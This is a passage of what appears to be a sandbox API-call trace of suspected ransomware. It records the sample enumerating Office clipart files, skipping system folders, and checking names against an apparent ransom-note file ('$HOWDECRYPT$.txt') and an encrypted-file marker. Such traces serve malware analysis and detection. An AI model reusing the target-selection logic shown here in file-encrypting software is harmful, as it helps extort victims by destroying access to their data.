hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.082] lstrcmpiW (lpString1="BL00390_.WMF", lpString2="Windows") returned -1 [0097.082] lstrlenW (lpString="Windows") returned 7 [0097.082] lstrcmpiW (lpString1="BL00390_.WMF", lpString2="$Recycle.bin") returned 1 [0097.082] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.082] lstrcmpiW (lpString1="BL00390_.WMF", lpString2="System Volume Information") returned -1 [0097.082] lstrlenW (lpString="System Volume Information") returned 25 [0097.082] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 67 [0097.082] StrStrIW (lpFirst="BL00390_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.082] lstrcmpW (lpString1="BL00390_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.083] lstrcmpW (lpString1="BL00390_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.083] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 67 [0097.083] GetProcessHeap () returned 0x2c0000 [0097.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c10f00 [0097.083] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x18c8) returned 0x2c310e0 [0097.083] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.083] lstrcmpiW (lpString1="BL00392_.WMF", lpString2="Windows") returned -1 [0097.083] lstrlenW (lpString="Windows") returned 7 [0097.083] lstrcmpiW (lpString1="BL00392_.WMF", lpString2="$Recycle.bin") returned 1 [0097.083] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.083] lstrcmpiW (lpString1="BL00392_.WMF", lpString2="System Volume Information") returned -1 [0097.083] lstrlenW (lpString="System Volume Information") returned 25 [0097.083] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 67 [0097.083] StrStrIW (lpFirst="BL00392_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.083] lstrcmpW (lpString1="BL00392_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.083] lstrcmpW (lpString1="BL00392_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.083] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 67 [0097.083] GetProcessHeap () returned 0x2c0000 [0097.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c10fd0 [0097.083] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x18d0) returned 0x2c310e0 [0097.083] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.084] lstrcmpiW (lpString1="BL00524_.WMF", lpString2="Windows") returned -1 [0097.084] lstrlenW (lpString="Windows") returned 7 [0097.084] lstrcmpiW (lpString1="BL00524_.WMF", lpString2="$Recycle.bin") returned 1 [0097.084] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.084] lstrcmpiW (lpString1="BL00524_.WMF", lpString2="System Volume Information") returned -1 [0097.084] lstrlenW (lpString="System Volume Information") returned 25 [0097.084] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 67 [0097.084] StrStrIW (lpFirst="BL00524_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.084] lstrcmpW (lpString1="BL00524_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.084] lstrcmpW (lpString1="BL00524_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.084] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 67 [0097.084] GetProcessHeap () returned 0x2c0000 [0097.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c110a0 [0097.084] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x18d8) returned 0x2c310e0 [0097.084] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.087] lstrcmpiW (lpString1="BL00525_.WMF", lpString2="Windows") returned -1 [0097.087] lstrlenW (lpString="Windows") returned 7 [0097.087] lstrcmpiW (lpString1="BL00525_.WMF", lpString2="$Recycle.bin") returned 1 [0097.087] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.087] lstrcmpiW (lpString1="BL00525_.WMF", lpString2="System Volume Information") returned -1 [0097.087] lstrlenW (lpString="System Volume Information") returned 25 [0097.087] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 67 [0097.087] StrStrIW (lpFirst="BL00525_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.087] lstrcmpW (lpString1="BL00525_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.087] lstrcmpW (lpString1="BL00525_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.087] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 67 [0097.087] GetProcessHeap () returned 0x2c0000 [0097.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c11170 [0097.088] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x18e0) returned 0x2c310e0 [0097.088] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.088] lstrcmpiW (lpString1="BL00526_.WMF", lpString2="Windows") returned -1 [0097.088] lstrlenW (lpString="Windows") returned 7 [0097.088] lstrcmpiW (lpString1="BL00526_.WMF", lpString2="$Recycle.bin") returned 1 [0097.088] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.088] lstrcmpiW (lpString1="BL00526_.WMF", lpString2="System Volume Information") returned -1 [0097.088] lstrlenW (lpString="System Volume Information") returned 25 [0097.088] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 67 [0097.088] StrStrIW (lpFirst="BL00526_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.088] lstrcmpW (lpString1="BL00526_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.088] lstrcmpW (lpString1="BL00526_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.088] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 67 [0097.088] GetProcessHeap () returned 0x2c0000 [0097.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c11240 [0097.088] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x18e8) returned 0x2c310e0 [0097.088] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.088] lstrcmpiW (lpString1="BL00648_.WMF", lpString2="Windows") returned -1 [0097.088] lstrlenW (lpString="Windows") returned 7 [0097.088] lstrcmpiW (lpString1="BL00648_.WMF", lpString2="$Recycle.bin") returned 1 [0097.088] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.088] lstrcmpiW (lpString1="BL00648_.WMF", lpString2="System Volume Information") returned -1 [0097.088] lstrlenW (lpString="System Volume Information") returned 25 [0097.089] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 67 [0097.089] StrStrIW (lpFirst="BL00648_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.089] lstrcmpW (lpString1="BL00648_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.089] lstrcmpW (lpString1="BL00648_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.089] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 67 [0097.089] GetProcessHeap () returned 0x2c0000 [0097.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c11310 [0097.089] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x18f0) returned 0x2c310e0 [0097.089] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.089] lstrcmpiW (lpString1="BL00921_.WMF", lpString2="Windows") returned -1 [0097.089] lstrlenW (lpString="Windows") returned 7 [0097.089] lstrcmpiW (lpString1="BL00921_.WMF", lpString2="$Recycle.bin") returned 1 [0097.089] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.089] lstrcmpiW (lpString1="BL00921_.WMF", lpString2="System Volume Information") returned -1 [0097.089] lstrlenW (lpString="System Volume Information") returned 25 [0097.089] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 67 [0097.089] StrStrIW (lpFirst="BL00921_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.089] lstrcmpW (lpString1="BL00921_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.089] lstrcmpW (lpString1="BL00921_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.089] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 67 [0097.089] GetProcessHeap () returned 0x2c0000 [0097.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c113e0 [0097.089] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x18f8) returned 0x2c310e0 [0097.090] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.090] lstrcmpiW (lpString1="BL00923_.WMF", lpString2="Windows") returned -1 [0097.090] lstrlenW (lpString="Windows") returned 7 [0097.090] lstrcmpiW (lpString1="BL00923_.WMF", lpString2="$Recycle.bin") returned 1 [0097.090] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.090] lstrcmpiW (lpString1="BL00923_.WMF", lpString2="System Volume Information") returned -1 [0097.090] lstrlenW (lpString="System Volume Information") returned 25 [0097.090] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 67 [0097.090] StrStrIW (lpFirst="BL00923_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.090] lstrcmpW (lpString1="BL00923_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.090] lstrcmpW (lpString1="BL00923_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.090] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 67 [0097.090] GetProcessHeap () returned 0x2c0000 [0097.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c114b0 [0097.090] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1900) returned 0x2c310e0 [0097.090] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.090] lstrcmpiW (lpString1="BL00932_.WMF", lpString2="Windows") returned -1 [0097.090] lstrlenW (lpString="Windows") returned 7 [0097.091] lstrcmpiW (lpString1="BL00932_.WMF", lpString2="$Recycle.bin") returned 1 [0097.092] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.092] lstrcmpiW (lpString1="BL00932_.WMF", lpString2="System Volume Information") returned -1 [0097.092] lstrlenW (lpString="System Volume Information") returned 25 [0097.092] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 67 [0097.092] StrStrIW (lpFirst="BL00932_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.092] lstrcmpW (lpString1="BL00932_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.092] lstrcmpW (lpString1="BL00932_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.092] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 67 [0097.092] GetProcessHeap () returned 0x2c0000 [0097.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c11580 [0097.092] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1908) returned 0x2c310e0 [0097.092] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.092] lstrcmpiW (lpString1="BL00985_.WMF", lpString2="Windows") returned -1 [0097.092] lstrlenW (lpString="Windows") returned 7 [0097.092] lstrcmpiW (lpString1="BL00985_.WMF", lpString2="$Recycle.bin") returned 1 [0097.092] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.092] lstrcmpiW (lpString1="BL00985_.WMF", lpString2="System Volume Information") returned -1 [0097.092] lstrlenW (lpString="System Volume Information") returned 25 [0097.092] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 67 [0097.092] StrStrIW (lpFirst="BL00985_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.092] lstrcmpW (lpString1="BL00985_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.092] lstrcmpW (lpString1="BL00985_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.093] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 67 [0097.093] GetProcessHeap () returned 0x2c0000 [0097.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c11650 [0097.093] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1910) returned 0x2c310e0 [0097.093] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.093] lstrcmpiW (lpString1="BOAT.WMF", lpString2="Windows") returned -1 [0097.093] lstrlenW (lpString="Windows") returned 7 [0097.093] lstrcmpiW (lpString1="BOAT.WMF", lpString2="$Recycle.bin") returned 1 [0097.093] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.093] lstrcmpiW (lpString1="BOAT.WMF", lpString2="System Volume Information") returned -1 [0097.093] lstrlenW (lpString="System Volume Information") returned 25 [0097.093] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 63 [0097.093] StrStrIW (lpFirst="BOAT.WMF", lpSrch=".spyhunter") returned 0x0 [0097.093] lstrcmpW (lpString1="BOAT.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.093] lstrcmpW (lpString1="BOAT.WMF", lpString2="_uninstalling_.png") returned 1 [0097.093] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 63 [0097.093] GetProcessHeap () returned 0x2c0000 [0097.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc0) returned 0x32d5b8 [0097.093] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1918) returned 0x2c310e0 [0097.093] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.093] lstrcmpiW (lpString1="BOATINST.WMF", lpString2="Windows") returned -1 [0097.093] lstrlenW (lpString="Windows") returned 7 [0097.093] lstrcmpiW (lpString1="BOATINST.WMF", lpString2="$Recycle.bin") returned 1 [0097.094] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.094] lstrcmpiW (lpString1="BOATINST.WMF", lpString2="System Volume Information") returned -1 [0097.094] lstrlenW (lpString="System Volume Information") returned 25 [0097.094] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 67 [0097.094] StrStrIW (lpFirst="BOATINST.WMF", lpSrch=".spyhunter") returned 0x0 [0097.094] lstrcmpW (lpString1="BOATINST.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.094] lstrcmpW (lpString1="BOATINST.WMF", lpString2="_uninstalling_.png") returned 1 [0097.094] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 67 [0097.094] GetProcessHeap () returned 0x2c0000 [0097.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c11720 [0097.094] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1920) returned 0x2c310e0 [0097.094] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.094] lstrcmpiW (lpString1="BS00076_.WMF", lpString2="Windows") returned -1 [0097.094] lstrlenW (lpString="Windows") returned 7 [0097.094] lstrcmpiW (lpString1="BS00076_.WMF", lpString2="$Recycle.bin") returned 1 [0097.094] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.094] lstrcmpiW (lpString1="BS00076_.WMF", lpString2="System Volume Information") returned -1 [0097.094] lstrlenW (lpString="System Volume Information") returned 25 [0097.094] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 67 [0097.094] StrStrIW (lpFirst="BS00076_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.095] lstrcmpW (lpString1="BS00076_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.095] lstrcmpW (lpString1="BS00076_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.095] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 67 [0097.095] GetProcessHeap () returned 0x2c0000 [0097.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c117f0 [0097.095] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1928) returned 0x2c310e0 [0097.095] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.095] lstrcmpiW (lpString1="BS00078_.WMF", lpString2="Windows") returned -1 [0097.095] lstrlenW (lpString="Windows") returned 7 [0097.095] lstrcmpiW (lpString1="BS00078_.WMF", lpString2="$Recycle.bin") returned 1 [0097.095] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.095] lstrcmpiW (lpString1="BS00078_.WMF", lpString2="System Volume Information") returned -1 [0097.095] lstrlenW (lpString="System Volume Information") returned 25 [0097.095] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 67 [0097.095] StrStrIW (lpFirst="BS00078_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.095] lstrcmpW (lpString1="BS00078_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.095] lstrcmpW (lpString1="BS00078_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.095] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 67 [0097.095] GetProcessHeap () returned 0x2c0000 [0097.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c118c0 [0097.095] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1930) returned 0x2c310e0 [0097.095] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.095] lstrcmpiW (lpString1="BS00092_.WMF", lpString2="Windows") returned -1 [0097.096] lstrlenW (lpString="Windows") returned 7 [0097.096] lstrcmpiW (lpString1="BS00092_.WMF", lpString2="$Recycle.bin") returned 1 [0097.096] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.096] lstrcmpiW (lpString1="BS00092_.WMF", lpString2="System Volume Information") returned -1 [0097.096] lstrlenW (lpString="System Volume Information") returned 25 [0097.096] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 67 [0097.096] StrStrIW (lpFirst="BS00092_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.096] lstrcmpW (lpString1="BS00092_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.096] lstrcmpW (lpString1="BS00092_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.096] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 67 [0097.096] GetProcessHeap () returned 0x2c0000 [0097.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c11990 [0097.096] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1938) returned 0x2c310e0 [0097.096] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.096] lstrcmpiW (lpString1="BS00100_.WMF", lpString2="Windows") returned -1 [0097.096] lstrlenW (lpString="Windows") returned 7 [0097.096] lstrcmpiW (lpString1="BS00100_.WMF", lpString2="$Recycle.bin") returned 1 [0097.096] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.096] lstrcmpiW (lpString1="BS00100_.WMF", lpString2="System Volume Information") returned -1 [0097.096] lstrlenW (lpString="System Volume Information") returned 25 [0097.096] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 67 [0097.096] StrStrIW (lpFirst="BS00100_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.096] lstrcmpW (lpString1="BS00100_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.097] lstrcmpW (lpString1="BS00100_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.097] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 67 [0097.097] GetProcessHeap () returned 0x2c0000 [0097.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c11a60 [0097.097] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1940) returned 0x2c310e0 [0097.097] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.097] lstrcmpiW (lpString1="BS00135_.WMF", lpString2="Windows") returned -1 [0097.097] lstrlenW (lpString="Windows") returned 7 [0097.097] lstrcmpiW (lpString1="BS00135_.WMF", lpString2="$Recycle.bin") returned 1 [0097.097] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.097] lstrcmpiW (lpString1="BS00135_.WMF", lpString2="System Volume Information") returned -1 [0097.097] lstrlenW (lpString="System Volume Information") returned 25 [0097.097] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 67 [0097.097] StrStrIW (lpFirst="BS00135_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.097] lstrcmpW (lpString1="BS00135_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.097] lstrcmpW (lpString1="BS00135_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.097] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 67 [0097.097] GetProcessHeap () returned 0x2c0000 [0097.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c11b30 [0097.097] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1948) returned 0x2c310e0 [0097.098] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.098] lstrcmpiW (lpString1="BS00136_.WMF", lpString2="Windows") returned -1 [0097.098] lstrlenW (lpString="Windows") returned 7 [0097.098] lstrcmpiW (lpString1="BS00136_.WMF", lpString2="$Recycle.bin") returned 1 [0097.098] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.098] lstrcmpiW (lpString1="BS00136_.WMF", lpString2="System Volume Information") returned -1 [0097.098] lstrlenW (lpString="System Volume Information") returned 25 [0097.098] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 67 [0097.098] StrStrIW (lpFirst="BS00136_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.098] lstrcmpW (lpString1="BS00136_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.098] lstrcmpW (lpString1="BS00136_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.098] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 67 [0097.098] GetProcessHeap () returned 0x2c0000 [0097.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c11c00 [0097.098] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1950) returned 0x2c310e0 [0097.098] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.098] lstrcmpiW (lpString1="BS00145_.WMF", lpString2="Windows") returned -1 [0097.098] lstrlenW (lpString="Windows") returned 7 [0097.098] lstrcmpiW (lpString1="BS00145_.WMF", lpString2="$Recycle.bin") returned 1 [0097.098] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.098] lstrcmpiW (lpString1="BS00145_.WMF", lpString2="System Volume Information") returned -1 [0097.098] lstrlenW (lpString="System Volume Information") returned 25 [0097.098] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 67 [0097.099] StrStrIW (lpFirst="BS00145_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.099] lstrcmpW (lpString1="BS00145_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.099] lstrcmpW (lpString1="BS00145_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.099] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 67 [0097.099] GetProcessHeap () returned 0x2c0000 [0097.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c11cd0 [0097.099] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1958) returned 0x2c310e0 [0097.099] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.099] lstrcmpiW (lpString1="BS00174_.WMF", lpString2="Windows") returned -1 [0097.099] lstrlenW (lpString="Windows") returned 7 [0097.099] lstrcmpiW 